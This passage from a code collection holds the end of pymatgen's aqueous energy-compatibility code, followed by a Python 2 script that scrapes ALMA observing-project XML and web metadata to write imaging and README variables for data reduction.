# formation energy so that we don't double count them
# next, remove MU_H2O for each water molecule present
hydrate_adjustment = -1 * (self.h2o_adjustments * 3 + MU_H2O)
adjustments.append(
CompositionEnergyAdjustment(
hydrate_adjustment,
nH2O,
uncertainty_per_atom=np.nan,
name="MP Aqueous hydrate",
cls=self.as_dict(),
description="Adjust the energy of solid hydrate compounds (compounds "
"containing H2O molecules in their structure) so that the "
"free energies of embedded H2O molecules match the experimental"
" value enforced by the MP Aqueous energy referencing scheme.",
)
)
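        # Illustrative example (editor's sketch, hypothetical composition): for a
        # hydrate such as FeSO4.7H2O, comp["H"] / 2 = 7 and comp["O"] = 11, so
        # nH2O = min(7, 11) = 7 and the total hydrate adjustment is roughly
        # 7 * -(3 * self.h2o_adjustments + MU_H2O) eV.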
return adjustments
def process_entries(
self, entries: Union[ComputedEntry, List[ComputedEntry]], clean: bool = False, verbose: bool = False
):
"""
Process a sequence of entries with the chosen Compatibility scheme.
Args:
entries: ComputedEntry or [ComputedEntry]
clean: bool, whether to remove any previously-applied energy adjustments.
If True, all EnergyAdjustment are removed prior to processing the Entry.
Default is False.
verbose: bool, whether to display progress bar for processing multiple entries.
Default is False.
Returns:
A list of adjusted entries. Entries in the original list which
are not compatible are excluded.
"""
# convert input arg to a list if not already
if isinstance(entries, ComputedEntry):
entries = [entries]
# pre-process entries with the given solid compatibility class
if self.solid_compat:
entries = self.solid_compat.process_entries(entries, clean=True)
# when processing single entries, all H2 polymorphs will get assigned the
# same energy
if len(entries) == 1 and entries[0].composition.reduced_formula == "H2":
warnings.warn(
"Processing single H2 entries will result in the all polymorphs "
"being assigned the same energy. This should not cause problems "
"with Pourbaix diagram construction, but may be confusing. "
"Pass all entries to process_entries() at once in if you want to "
"preserve H2 polymorph energy differences."
)
# extract the DFT energies of oxygen and water from the list of entries, if present
# do not do this when processing a single entry, as it might lead to unintended
# results
if len(entries) > 1:
if not self.o2_energy:
o2_entries = [e for e in entries if e.composition.reduced_formula == "O2"]
if o2_entries:
self.o2_energy = min(e.energy_per_atom for e in o2_entries)
if not self.h2o_energy and not self.h2o_adjustments:
h2o_entries = [e for e in entries if e.composition.reduced_formula == "H2O"]
if h2o_entries:
h2o_entries = sorted(h2o_entries, key=lambda e: e.energy_per_atom)
self.h2o_energy = h2o_entries[0].energy_per_atom
self.h2o_adjustments = h2o_entries[0].correction / h2o_entries[0].composition.num_atoms
h2_entries = [e for e in entries if e.composition.reduced_formula == "H2"]
if h2_entries:
h2_entries = sorted(h2_entries, key=lambda e: e.energy_per_atom)
self.h2_energy = h2_entries[0].energy_per_atom # type: ignore
return super().process_entries(entries, clean=clean, verbose=verbose)
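    # Minimal usage sketch (editor's illustration; the instance name and exact
    # constructor arguments are assumptions, not part of the original file):
    #   compat = <this aqueous compatibility class>(solid_compat=None)
    #   processed = compat.process_entries(entries)
    # where `entries` is a list of ComputedEntry objects that includes ground-state
    # O2 and H2O entries, so the reference energies above can be extracted.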
|
materialsproject/pymatgen
|
pymatgen/entries/compatibility.py
|
Python
|
mit
| 61,576
|
[
"VASP",
"pymatgen"
] |
cb62c13952932217f4b288c72b74708c6322a218f5f689f0286f5ebd9230b424
|
# Author: Brian Kirk
# --------------------------------------------------------------------------------------------------
def ReadDataFromWeb(dataurl,dataurl2, mous_code):
# --------------------------------------------------------------------------------------------------
"""
This function reads the text file from the given url and creates a dictionary
"""
import urllib2
print "Gathering metadata..."
response = urllib2.urlopen(dataurl)
html = response.read().splitlines()
response = None
datadict = {'mous':mous_code}
mousid = mous_code
mousid2=mousid.replace("___","://").replace("_","/")
for line in html:
line=line.split()
#print line[0],line[1],line[2],line[3],line[4]
if line[4]==mousid:
#print "found MOUS"
#print line[0]
datadict['code']=line[0]
datadict['sgous']=line[2]
datadict['gous']=line[3]
datadict['mous']= line[4]
if datadict.has_key('sbuids'):
datadict['sbuids'].append(line[9])
else:
datadict['sbuids']=[line[9]]
if datadict.has_key('sbnames'):
datadict['sbnames'].append(line[10])
else:
datadict['sbnames']=[line[10]]
response2 = urllib2.urlopen(dataurl2)
html2 = response2.read().splitlines()
response2 = None
for line2 in html2:
line2=line2.split("|")
if line2[2]=='SemiPass':
continue
if line2[0]==mousid2:
if datadict.has_key('ebuids'):
datadict['ebuids'].append(line2[1])
else:
datadict['ebuids']=[line2[1]]
    # We want to uniquify the SB names (and the EB names, although there should be nothing to do there)
datadict['sbnames'] = list(set(datadict['sbnames']))
datadict['sbuids'] = list(set(datadict['sbuids']))
datadict['ebuids'] = list(set(datadict['ebuids']))
gousstr = datadict['gous'].replace("___","://").replace("_","/")
mousstr = datadict['mous'].replace("___","://").replace("_","/")
if len(datadict['sbnames'])==1:
sbnamestr=" "+datadict['sbnames'][0].replace('"','')
else:
sbnamestr="s "+",".join(datadict['sbnames'][0:-1])+" and "+datadict['sbnames'][-1]
if len(datadict['sbuids'])==1:
sbuidstr=" "+datadict['sbuids'][0].replace("___","://").replace("_","/")
else:
sbuidstr="s "+",".join(datadict['sbuids'][0:-1])+" and "+datadict['sbuids'][-1]
if len(datadict['ebuids'])==1:
ebuidstr=" "+datadict['ebuids'][0].replace("___","://").replace("_","/")
else:
ebuidstr=" "+",".join(datadict['ebuids'][0:-1]).replace("___","://").replace("_","/")+" and "+datadict['ebuids'][-1].replace("___","://").replace("_","/")
print "Gathering metadata done"
return datadict
# --------------------------------------------------------------------------------------------------
def SetXMLFiles(datadict, user_name, path_aot, name_aot):
# --------------------------------------------------------------------------------------------------
import zipfile #allows unpacking of the .aot zipfile
import os
print "Initializing XML databases..."
#Getting some basic information to start:
mous_code = datadict['mous']
SB_name = str(datadict['sbnames'][0]).strip('\"')
#Unpacking .aot zipfile to access the XML files to collect necessary information for the data-staging (XML for imaging & README later)
os.chdir(path_aot)
os.system('mkdir %s_FILES' % name_aot)
zf = zipfile.ZipFile(name_aot)
zf.extractall('%s_FILES' % name_aot)
#Parsing the XML databases into a python readable format
import xml.etree.ElementTree as ET #this is for accessing the XML datasets
project_tree = ET.parse('%s/%s_FILES/ObsProject.xml' % (path_aot, name_aot))
project_root = project_tree.getroot()
proposal_tree = ET.parse('%s/%s_FILES/ObsProposal.xml' % (path_aot, name_aot))
proposal_root = proposal_tree.getroot()
attachment_tree = ET.parse('%s/%s_FILES/ObsAttachment.xml' % (path_aot, name_aot)) #only has info about the .aot package
attachment_root = attachment_tree.getroot()
#Loading namespaces from XML files (single/double quotes matter!):
xmlns = {
"ent":"Alma/CommonEntity",
"val":"Alma/ValueTypes",
"prp":"Alma/ObsPrep/ObsProposal",
"orv":"Alma/ObsPrep/ObsReview",
"ps":"Alma/ObsPrep/ProjectStatus",
"oat":"Alma/ObsPrep/ObsAttachment",
"prj":"Alma/ObsPrep/ObsProject",
"sbl":"Alma/ObsPrep/SchedBlock",
"xsi":"http://www.w3.org/2001/XMLSchema-instance"
}
print 'Initializing XML databases complete.'
return project_root, proposal_root, xmlns
# --------------------------------------------------------------------------------------------------
def HarvestXMLLine (project_root, proposal_root, xmlns, SB_name, path_aot, name_aot):
# --------------------------------------------------------------------------------------------------
'''
Harvesting the XML files for useful information about the project and README
'''
print'Harvesting XML files for data...'
import glob
import os
import xml.etree.ElementTree as ET #this is for accessing the XML datasets
# ----------------------------------------
#Getting the project number from the ObsProject.xml dataset
XML_dict = {}
XML_dict['project_number'] = project_root.find("prj:code", xmlns).text
# ----------------------------------------
# ----------------------------------------
#Determining which SchedBlock XML file to use from the project based on the SB name provided by the user
os.chdir('%s/%s_FILES' % (path_aot, name_aot))
schedblock_files = glob.glob('SchedBlock*.xml') #getting all XML files
for sblock in schedblock_files:
if SB_name in open(sblock).read():
#schedblock_name = sblock #this is only used in debugging if I need to know which sblock file quickly
schedblock_tree = ET.parse('%s/%s_FILES/%s' % (path_aot, name_aot, sblock))
schedblock_root = schedblock_tree.getroot() #see above note
# ----------------------------------------
# ----------------------------------------
#Scraping the XML files for the required information for the imaging script & README
XML_dict['projectName'] = project_root.find("prj:projectName", xmlns).text
XML_dict['pI'] = project_root.find("prj:pI", xmlns).text
XML_dict['project_version'] = project_root.find("prj:version", xmlns).text
XML_dict['projectCode'] = project_root.find("prj:code", xmlns).text
#XML_dict['pointing_accruacy'] = schedblock_root.find("./prj:ObsUnitControl/prj:CalibrationRequirements/prj:pointingAccuracy", xmlns).text
XML_dict['angular_resolution'] = project_root.find("./prj:ObsProgram/prj:ScienceGoal/prj:PerformanceParameters/prj:desiredAngularResolution", xmlns).text
# ----------------------------------------
# ----------------------------------------
#Cycle number (determined by year of observation)
XML_dict['cycle'] = proposal_root.find("prp:cycle", xmlns).text #ex: 2015.1
if '2015' in XML_dict['cycle']:
XML_dict['cycle'] = "Cycle 3"
if '2014' in XML_dict['cycle']:
XML_dict['cycle'] = "Cycle 2"
if '2013' in XML_dict['cycle']:
XML_dict['cycle'] = "Cycle 2"
if '2012' in XML_dict['cycle']:
XML_dict['cycle'] = "Cycle 1"
# ----------------------------------------
# ----------------------------------------
#I need to determine what the science target is (can't always be done through /sbl:name or /sbl:sourceName).
#What I do is find the /sbl:name that has "Primary" and record the index number of which child node it is
#I record index number with the i-iterator.
#I use that index number to search the /sbl:FieldSource and determine the unique entityPartId number.
#Since that number is unique I've secured a way to locate all relevant information about the science target.
i=1
for child in schedblock_root.findall("./sbl:FieldSource/sbl:name",xmlns):
if "Primary" in child.text:
primary_index = i
i=i+1
#I need to create a string that codes in the index value since XPath doesn't take variables. This will have to be done for each item that is located using the entityPartId since it's located in a variable.
entityPartId_string = "./sbl:FieldSource[%i]" % primary_index
XML_dict['entityPartId'] = schedblock_root.find(entityPartId_string, xmlns).attrib.get('entityPartId')
    #Now I can use XPath and the unique entityPartId to guarantee correct results
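    # Illustrative example (editor's sketch, hypothetical values): if the third
    # FieldSource node is the one named "Primary", primary_index == 3, so
    # entityPartId_string becomes "./sbl:FieldSource[3]" and
    # XML_dict['entityPartId'] holds that node's entityPartId attribute.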
# ----------------------------------------
# ----------------------------------------
#Source name
source_string = "./sbl:FieldSource[@entityPartId='%s']/sbl:sourceName" % XML_dict['entityPartId']
XML_dict['source_name'] = schedblock_root.find(source_string, xmlns).text
# ----------------------------------------
# ----------------------------------------
#Reference system
reference_string = "./sbl:FieldSource[@entityPartId='%s']/sbl:sourceVelocity" % XML_dict['entityPartId']
XML_dict['outframe'] = schedblock_root.find(reference_string, xmlns).attrib.get('referenceSystem')
# ----------------------------------------
# ----------------------------------------
#Requested rms
for child in schedblock_root.findall("./sbl:ScienceParameters/sbl:sensitivityGoal", xmlns):
rms_value = child.text #sensitivity may not be rms
rms_unit = child.attrib.get('unit')
XML_dict['sensitivity'] = rms_value + rms_unit
# ----------------------------------------
# ----------------------------------------
#Determining if the bandwidth used for sensitivity is in frequency or velocity space
repBandwidth = schedblock_root.find("./sbl:ScienceParameters/sbl:representativeBandwidth", xmlns).text
repBandwidthUnit = schedblock_root.find("./sbl:ScienceParameters/sbl:representativeBandwidth", xmlns).attrib
if 'Hz' in repBandwidthUnit['unit']:
XML_dict['clean_mode'] = 'frequency'
else:
XML_dict['clean_mode'] = 'velocity'
# ----------------------------------------
# ----------------------------------------
#Determining continuum width and line frequency:
XML_dict['width'] = repBandwidth + repBandwidthUnit.get('unit') #this is to put it in proper form for the imaging script
XML_dict['skyFrequency'] = schedblock_root.find("./sbl:ScienceParameters/sbl:representativeFrequency", xmlns).text
XML_dict['restFrequency'] = schedblock_root.find("./sbl:SpectralSpec/sbl:BLCorrelatorConfiguration/sbl:BLBaseBandConfig/sbl:BLSpectralWindow/sbl:SpectralLine/sbl:restFrequency",xmlns).text
#Now converting the bandwidth for sensitivity to velocity space instead of frequency space
if 'MHz' in repBandwidthUnit['unit']:
XML_dict['repBandwidthGHz'] = float(repBandwidth) * 0.001
        XML_dict['repBandwidthKMs'] = round((XML_dict['repBandwidthGHz'] / float(XML_dict['restFrequency'])) * 300000, 3) # 300000 is the speed of light in km/s; the 3 tells round() how many decimal places to keep. I set 3 because that matches the MHz conversion.
if 'GHz' in repBandwidthUnit['unit']:
XML_dict['repBandwidthGHz'] = float(repBandwidth)
XML_dict['repBandwidthKMs'] = round((XML_dict['repBandwidthGHz'] / float(XML_dict['restFrequency'])) * 300000, 3)
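    # Worked example (editor's illustration, hypothetical numbers): a representative
    # bandwidth of 1 MHz at a rest frequency of 100 GHz gives
    # repBandwidthKMs = 0.001 / 100 * 300000 = 3 km/s.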
# ----------------------------------------
# ----------------------------------------
#Transition name:
for child in schedblock_root.findall("./sbl:SpectralSpec/sbl:FrequencySetup/sbl:transitionName", xmlns):
if child.text != 'pointing':
XML_dict['transition_name'] = child.text
# ----------------------------------------
# ----------------------------------------
#Start velocity
for child in proposal_root.findall("./prj:ScienceGoal/prj:TargetParameters/prj:sourceName", xmlns):
if child.text == '%s' % XML_dict['source_name']: #the start velocity is determined by the source target, so you need that first
XML_dict['velocity'] = proposal_root.find("./prj:ScienceGoal/prj:TargetParameters/prj:sourceVelocity/val:centerVelocity", xmlns).text
# ----------------------------------------
# ----------------------------------------
#Expected Line Width (to determine nchan): what happens if continuum project?
for child in proposal_root.findall("./prj:ScienceGoal/prj:TargetParameters/prj:sourceName", xmlns):
if child.text == '%s' % XML_dict['source_name']:
line_width_unit = proposal_root.find("./prj:ScienceGoal/prj:TargetParameters/prj:ExpectedProperties/prj:expectedLineWidth", xmlns).attrib
XML_dict['line_width'] = proposal_root.find("./prj:ScienceGoal/prj:TargetParameters/prj:ExpectedProperties/prj:expectedLineWidth", xmlns).text
XML_dict['line_width_kms'] = round(float(XML_dict['line_width']) / float(XML_dict['restFrequency']) * 300000)
# ----------------------------------------
# ----------------------------------------
    #...now determining the line cube properties with additional emission-free channels: it's preferred to have a factor of 5x the line width surrounding the line in the cube
if float(XML_dict['velocity']) < 0:
XML_dict['cube_start'] = float(XML_dict['line_width_kms']) * 5.0 *-1 + float(XML_dict['velocity'])
else:
XML_dict['cube_start'] = float(XML_dict['line_width_kms']) * 5.0 - float(XML_dict['velocity'])
XML_dict['cube_end'] = float(XML_dict['line_width_kms']) * 5.0 + float(XML_dict['velocity'])
XML_dict['cube_size'] = abs(XML_dict['cube_start'] - XML_dict['cube_end'])
XML_dict['nchan'] = round(XML_dict['cube_size'] / float(XML_dict['repBandwidthKMs']))
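    # Worked example (editor's illustration, hypothetical numbers): with
    # velocity = -20 km/s, line_width_kms = 4 and repBandwidthKMs = 2,
    # cube_start = 4*5*-1 + (-20) = -40, cube_end = 4*5 + (-20) = 0,
    # so cube_size = 40 km/s and nchan = round(40 / 2) = 20 channels.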
# ----------------------------------------
# ----------------------------------------
#Imagermode: csclean or mosaic mode?
imagermode_string = "./sbl:FieldSource[@entityPartId='%s']/sbl:PointingPattern/sbl:isMosaic" % XML_dict['entityPartId']
imagermode_boolean = schedblock_root.find(imagermode_string, xmlns).text
if imagermode_boolean == 'false':
XML_dict['imagermode'] = 'csclean'
else:
XML_dict['imagermode'] = 'mosaic'
# ----------------------------------------
# ----------------------------------------
#SPW information from SchedBlock files
#I have to use the indexing because I can't specify the sbl:name attribute until I know what it is - so I look for "Science" then get the index,
index=1 # Note that a node's position in a context is not zero-based. The first node has a position of 1.
for SpectralSpec in schedblock_root.findall("./sbl:SpectralSpec/sbl:name", xmlns):
if 'Science' in SpectralSpec.text:
sbl_name = SpectralSpec.text
science_setup_index = index
index = index + 1
#...then real name, then that SpectralSpec (using the index) for right spw info
spw_channel_list_string = "./sbl:SpectralSpec/[%i]/sbl:BLCorrelatorConfiguration/sbl:BLBaseBandConfig/sbl:BLSpectralWindow/sbl:effectiveNumberOfChannels" % science_setup_index
spw_channel_list = schedblock_root.findall(spw_channel_list_string, xmlns)
spw_channels = []
for spw in spw_channel_list:
spw_channels.append(spw.text) #continuum will be low # of channels, lines will have high # of channels
XML_dict['spw_channels'] = spw_channels
#...then getting the averaging used on each SPW
spw_avg_list_string = "./sbl:SpectralSpec/[%i]/sbl:BLCorrelatorConfiguration/sbl:BLBaseBandConfig/sbl:BLSpectralWindow/sbl:spectralAveragingFactor" % science_setup_index
spw_avg_list = schedblock_root.findall(spw_avg_list_string, xmlns)
spw_averaging= []
for spw in spw_avg_list:
spw_averaging.append(spw.text)
XML_dict['spw_averaging'] = spw_averaging
#...then determining the final number of channels after averaging
width_after_averaging = []
for i in range(0,len(spw_channels)):
post_average = int(spw_channels[i]) / int(spw_averaging[i])
width_after_averaging.append(post_average)
XML_dict['width_after_averaging'] = width_after_averaging
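    # Worked example (editor's illustration, hypothetical numbers): an SPW with
    # 3840 effective channels and a spectral averaging factor of 2 ends up with
    # 3840 / 2 = 1920 channels in width_after_averaging.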
# ----------------------------------------
print'Harvesting XML files complete'
return XML_dict
# --------------------------------------------------------------------------------------------------
def HarvestXMLContinuum (project_root, proposal_root, xmlns, SB_name, path_aot, name_aot):
# --------------------------------------------------------------------------------------------------
'''
Harvesting the XML files for useful information about the project and README
'''
print'Harvesting XML files for data...'
import glob
import os
import xml.etree.ElementTree as ET #this is for accessing the XML datasets
# ----------------------------------------
#Getting the project number from the ObsProject.xml dataset
XML_dict = {}
XML_dict['project_number'] = project_root.find("prj:code", xmlns).text
# ----------------------------------------
# ----------------------------------------
#Determining which SchedBlock XML file to use from the project based on the SB name provided by the user
os.chdir('%s/%s_FILES' % (path_aot, name_aot))
schedblock_files = glob.glob('SchedBlock*.xml') #getting all XML files
for sblock in schedblock_files:
if SB_name in open(sblock).read():
#schedblock_name = sblock #this is only used in debugging if I need to know which sblock file quickly
schedblock_tree = ET.parse('%s/%s_FILES/%s' % (path_aot, name_aot, sblock))
schedblock_root = schedblock_tree.getroot() #see above note
# ----------------------------------------
# ----------------------------------------
#Scraping the XML files for the required information for the imaging script & README
XML_dict['projectName'] = project_root.find("prj:projectName", xmlns).text
XML_dict['pI'] = project_root.find("prj:pI", xmlns).text
XML_dict['project_version'] = project_root.find("prj:version", xmlns).text
XML_dict['projectCode'] = project_root.find("prj:code", xmlns).text
#XML_dict['pointing_accruacy'] = schedblock_root.find("./prj:ObsUnitControl/prj:CalibrationRequirements/prj:pointingAccuracy", xmlns).text
XML_dict['angular_resolution'] = project_root.find("./prj:ObsProgram/prj:ScienceGoal/prj:PerformanceParameters/prj:desiredAngularResolution", xmlns).text
# ----------------------------------------
# ----------------------------------------
#Cycle number (determined by year of observation)
XML_dict['cycle'] = proposal_root.find("prp:cycle", xmlns).text #ex: 2015.1
if '2015' in XML_dict['cycle']:
XML_dict['cycle'] = "Cycle 3"
if '2014' in XML_dict['cycle']:
XML_dict['cycle'] = "Cycle 2"
if '2013' in XML_dict['cycle']:
XML_dict['cycle'] = "Cycle 2"
if '2012' in XML_dict['cycle']:
XML_dict['cycle'] = "Cycle 1"
# ----------------------------------------
# ----------------------------------------
#I need to determine what the science target is (can't always be done through /sbl:name or /sbl:sourceName).
#What I do is find the /sbl:name that has "Primary" and record the index number of which child node it is
#I record index number with the i-iterator.
#I use that index number to search the /sbl:FieldSource and determine the unique entityPartId number.
#Since that number is unique I've secured a way to locate all relevant information about the science target.
i=1
for child in schedblock_root.findall("./sbl:FieldSource/sbl:name",xmlns):
if "Primary" in child.text:
primary_index = i
i=i+1
#I need to create a string that codes in the index value since XPath doesn't take variables. This will have to be done for each item that is located using the entityPartId since it's located in a variable.
entityPartId_string = "./sbl:FieldSource[%i]" % primary_index
XML_dict['entityPartId'] = schedblock_root.find(entityPartId_string, xmlns).attrib.get('entityPartId')
    #Now I can use XPath and the unique entityPartId to guarantee correct results
# ----------------------------------------
# ----------------------------------------
#Source name
source_string = "./sbl:FieldSource[@entityPartId='%s']/sbl:sourceName" % XML_dict['entityPartId']
XML_dict['source_name'] = schedblock_root.find(source_string, xmlns).text
# ----------------------------------------
# ----------------------------------------
#Reference system
reference_string = "./sbl:FieldSource[@entityPartId='%s']/sbl:sourceVelocity" % XML_dict['entityPartId']
XML_dict['outframe'] = schedblock_root.find(reference_string, xmlns).attrib.get('referenceSystem')
# ----------------------------------------
# ----------------------------------------
#Requested rms
for child in schedblock_root.findall("./sbl:ScienceParameters/sbl:sensitivityGoal", xmlns):
rms_value = child.text #sensitivity may not be rms
rms_unit = child.attrib.get('unit')
XML_dict['sensitivity'] = rms_value + rms_unit
# ----------------------------------------
# ----------------------------------------
#Determining if the bandwidth used for sensitivity is in frequency or velocity space
repBandwidth = schedblock_root.find("./sbl:ScienceParameters/sbl:representativeBandwidth", xmlns).text
repBandwidthUnit = schedblock_root.find("./sbl:ScienceParameters/sbl:representativeBandwidth", xmlns).attrib
if 'Hz' in repBandwidthUnit['unit']:
XML_dict['clean_mode'] = 'frequency'
else:
XML_dict['clean_mode'] = 'velocity'
# ----------------------------------------
# ----------------------------------------
#We know it's continuum here (from user input) so should be 7.5GHz:
XML_dict['width'] = repBandwidth + repBandwidthUnit.get('unit') #this is to put it in proper form for the imaging script
# ----------------------------------------
# ----------------------------------------
#Imagermode: csclean or mosaic mode?
imagermode_string = "./sbl:FieldSource[@entityPartId='%s']/sbl:PointingPattern/sbl:isMosaic" % XML_dict['entityPartId']
imagermode_boolean = schedblock_root.find(imagermode_string, xmlns).text
if imagermode_boolean == 'false':
XML_dict['imagermode'] = 'csclean'
else:
XML_dict['imagermode'] = 'mosaic'
# ----------------------------------------
# ----------------------------------------
#SPW information from SchedBlock files
#I have to use the indexing because I can't specify the sbl:name attribute until I know what it is - so I look for "Science" then get the index,
index=1 # Note that a node's position in a context is not zero-based. The first node has a position of 1.
for SpectralSpec in schedblock_root.findall("./sbl:SpectralSpec/sbl:name", xmlns):
if 'Science' in SpectralSpec.text:
sbl_name = SpectralSpec.text
science_setup_index = index
index = index + 1
#...then real name, then that SpectralSpec (using the index) for right spw info
spw_channel_list_string = "./sbl:SpectralSpec/[%i]/sbl:BLCorrelatorConfiguration/sbl:BLBaseBandConfig/sbl:BLSpectralWindow/sbl:effectiveNumberOfChannels" % science_setup_index
spw_channel_list = schedblock_root.findall(spw_channel_list_string, xmlns)
spw_channels = []
for spw in spw_channel_list:
spw_channels.append(spw.text) #continuum will be low # of channels, lines will have high # of channels
XML_dict['spw_channels'] = spw_channels
#...then getting the averaging used on each SPW
spw_avg_list_string = "./sbl:SpectralSpec/[%i]/sbl:BLCorrelatorConfiguration/sbl:BLBaseBandConfig/sbl:BLSpectralWindow/sbl:spectralAveragingFactor" % science_setup_index
spw_avg_list = schedblock_root.findall(spw_avg_list_string, xmlns)
spw_averaging= []
for spw in spw_avg_list:
spw_averaging.append(spw.text)
XML_dict['spw_averaging'] = spw_averaging
#...then determining the final number of channels after averaging
width_after_averaging = []
for i in range(0,len(spw_channels)):
post_average = int(spw_channels[i]) / int(spw_averaging[i])
width_after_averaging.append(post_average)
XML_dict['width_after_averaging'] = width_after_averaging
# ----------------------------------------
print'Harvesting XML files complete'
return XML_dict
#--------------------------------------------------
def WriteLineInfo(datadict, XML_dict, project_path, SB_name, jaws_project, manual_project):
#--------------------------------------------------
import os
import IPython
print'Generating variables file...'
#Writing a new file containing all the "scraped" XML information
#if it's manual, it has a different path structure
if manual_project == 'yes':
os.chdir('%s%s_%s/' % (project_path, XML_dict['project_number'], datadict['mous']))
    #this is because something silly between pipetemp and the NAASC-run pipeline produces slightly different filenames
elif jaws_project == 'yes':
os.chdir('%s/tbuff0_%s.MOUS_%s.SBNAME.%s-analysis/sg_ouss_id/group_ouss_id/member_ouss_id/' % (project_path, XML_dict['project_number'], datadict['mous'], SB_name))
else:
os.chdir('%s%s.MOUS.%s.SBNAME.%s-analysis/sg_ouss_id/group_ouss_id/member_ouss_id/' % (project_path, XML_dict['project_number'], datadict['mous'], SB_name))
    variable_file = open('xml_variables.txt', 'w')
    variable_file.truncate()
#Imaging Info
variable_file.write('\tImaging Script variables: Double-check these values in the OT\n')
variable_file.write('Number of spws (length of array) and their width (values in array element): %s \n' % XML_dict['spw_channels'])
#variable_file.write('Field (for clean) = \n')
variable_file.write('imagermode = %s\n' % XML_dict['imagermode'])
#variable_file.write('Cell size = \n') #cell size (206265/longest wavelength (uvdist or uvwave dist))
#variable_file.write('Image size = \n') #calculate once cell size is known
variable_file.write('outframe = %s\n' % XML_dict['outframe'])
variable_file.write('veltype = radio\n')
#variable_file.write('fitspw = \n')
variable_file.write('sourcename = %s\n' % XML_dict['source_name'])
variable_file.write('linename = %s\n' % XML_dict['transition_name'])
#variable_file.write('Line-cube start velocity = %s <-- changed on purpose for adequate cube space\n' % XML_dict['cube_start'])
variable_file.write('Line-cube width = %skm/s\n' % XML_dict['repBandwidthKMs'])
#variable_file.write('Line-cube nchan = %i\n' % XML_dict['nchan'])
if float(XML_dict['restFrequency']) > 500: #If the object has a z > 0.2 we use the sky frequency instead of rest frequency (I just guessed on the 500); I don't think the OT gets this from the XML's, I think it accesses some sort of database.
variable_file.write('restfreq = %s\n' % XML_dict['skyFrequency'])
else:
variable_file.write('restfreq = %s\n' % XML_dict['restFrequency'])
#Writing variables for README Info
variable_file.write('\n\n\n\n README info\n')
variable_file.write('Cycle: %s\n' % XML_dict['cycle'])
variable_file.write('Project Code: %s\n' % XML_dict['projectCode'])
variable_file.write('SB Name: %s\n' % SB_name)
variable_file.write('PI Name: %s\n' % XML_dict['pI'])
variable_file.write('Project Title: %s\n' % XML_dict['projectName'])
variable_file.write('Configuration: \n') #go into the "text.txt" file if manual, or html page if pipeline
variable_file.write('Proposed rms: %s / %skm/s width\n' % (XML_dict['sensitivity'] ,XML_dict['repBandwidthKMs']))
variable_file.write('Proposed beamsize: %s (double-check this)\n' % XML_dict['angular_resolution']) # beamsize: right now I have no way to determine between the different science goals in the ObsProject
variable_file.write('CASA (pipeline) version used for reduction: \n')
variable_file.write('QA2 Result: PASS/SEMIPASS\n')
variable_file.write('Total Number of Member SBs in this OUS Group: \n\n')
variable_file.write('Comments from reducer:\n\tCalibration Comments: \n\t\tmanual/pipeline? \n\t\tAntennas flagged? \n\t\tOther changes to calibration script? \n\n\tImaging comments: \n\t\tself cal? \n\t\tweighting? \n\t\tuvtaper? \n\t\tContinuum Subtraction? \n\n\tContinuum Clean iterations: \n\tContinuum beamsize: \n\tContinuum rms: \n\n\tLine-cube Clean iterations: \n\tLine-Cube beamsize: \n\tLine-cube rms: / ??km/s')
variable_file.write('\n\nThe PI may wish to modify the channels which were identified as "line-free" based on a dirty image or inspection of the calibrated visibilities.')
variable_file.write('\n\nIf the project is a SEMIPASS please add: This project was declared QA2 SEMIPASS, meaning that it did not meet the PI requested performance parameters (in this case because the Beam size sensitivity is a factor of 1.6 too high) but is being delivered anyway. The reason for the early delivery is: due to changes in array availability at the end of the Cycle, this OUS could not be re-observed with the requested configuration, and therefore, the science goals were not fully met.')
variable_file.close()
print'Generating variables file complete'
#--------------------------------------------------
def WriteContinuumInfo(datadict, XML_dict, project_path, SB_name, jaws_project, manual_project):
#--------------------------------------------------
import os
import IPython
print'Generating variables file...'
#Writing a new file containing all the "scraped" XML information
#if it's manual, it has a different path structure
if manual_project == 'yes':
os.chdir('%s%s_%s/' % (project_path, XML_dict['project_number'], datadict['mous']))
    #this is because something silly between pipetemp and the NAASC-run pipeline produces slightly different filenames
elif jaws_project == 'yes':
os.chdir('%s/tbuff0_%s.MOUS_%s.SBNAME.%s-analysis/sg_ouss_id/group_ouss_id/member_ouss_id/' % (project_path, XML_dict['project_number'], datadict['mous'], SB_name))
else:
os.chdir('%s%s.MOUS.%s.SBNAME.%s-analysis/sg_ouss_id/group_ouss_id/member_ouss_id/' % (project_path, XML_dict['project_number'], datadict['mous'], SB_name))
    variable_file = open('xml_variables.txt', 'w')
    variable_file.truncate()
#Imaging Info
variable_file.write('\tImaging Script variables: Double-check these values in the OT\n')
variable_file.write('Number of spws (length of array) and their width (values in array element): %s \n' % XML_dict['spw_channels'])
#variable_file.write('Field (for clean) = \n')
variable_file.write('imagermode = %s\n' % XML_dict['imagermode'])
#variable_file.write('Cell size = \n') #cell size (206265/longest wavelength (uvdist or uvwave dist))
#variable_file.write('Image size = \n') #calculate once cell size is known
variable_file.write('outframe = %s\n' % XML_dict['outframe'])
variable_file.write('veltype = radio\n')
#variable_file.write('fitspw = \n')
#Writing variables for README Info
variable_file.write('\n\n\n\n README info\n')
variable_file.write('Cycle: %s\n' % XML_dict['cycle'])
variable_file.write('Project Code: %s\n' % XML_dict['projectCode'])
variable_file.write('SB Name: %s\n' % SB_name)
variable_file.write('PI Name: %s\n' % XML_dict['pI'])
variable_file.write('Project Title: %s\n' % XML_dict['projectName'])
variable_file.write('Configuration: \n') #go into the "text.txt" file if manual, or html page if pipeline
variable_file.write('Proposed rms: %s / %skm/s width\n' % (XML_dict['sensitivity'] ,XML_dict['width']))
variable_file.write('Proposed beamsize: %s (double-check this)\n' % XML_dict['angular_resolution']) # beamsize: right now I have no way to determine between the different science goals in the ObsProject
variable_file.write('CASA (pipeline) version used for reduction: \n')
variable_file.write('QA2 Result: PASS/SEMIPASS\n')
variable_file.write('Total Number of Member SBs in this OUS Group: \n\n')
variable_file.write('Comments from reducer:\n\tCalibration Comments: \n\t\tmanual/pipeline? \n\t\tAntennas flagged? \n\t\tOther changes to calibration script? \n\n\tImaging comments: \n\t\tself cal? \n\t\tweighting? \n\t\tuvtaper? \n\n\tContinuum Clean iterations: \n\tContinuum beamsize: \n\tContinuum rms: ')
variable_file.write('\n\nThe PI may wish to modify the channels which were identified as "line-free" based on a dirty image or inspection of the calibrated visibilities.')
variable_file.write('\n\nIf the project is a SEMIPASS please add: This project was declared QA2 SEMIPASS, meaning that it did not meet the PI requested performance parameters (in this case because the Beam size sensitivity is a factor of 1.6 too high) but is being delivered anyway. The reason for the early delivery is: due to changes in array availability at the end of the Cycle, this OUS could not be re-observed with the requested configuration, and therefore, the science goals were not fully met.')
variable_file.close()
print'Generating variables file complete'
#--------------------------------------------------
def main():
#--------------------------------------------------
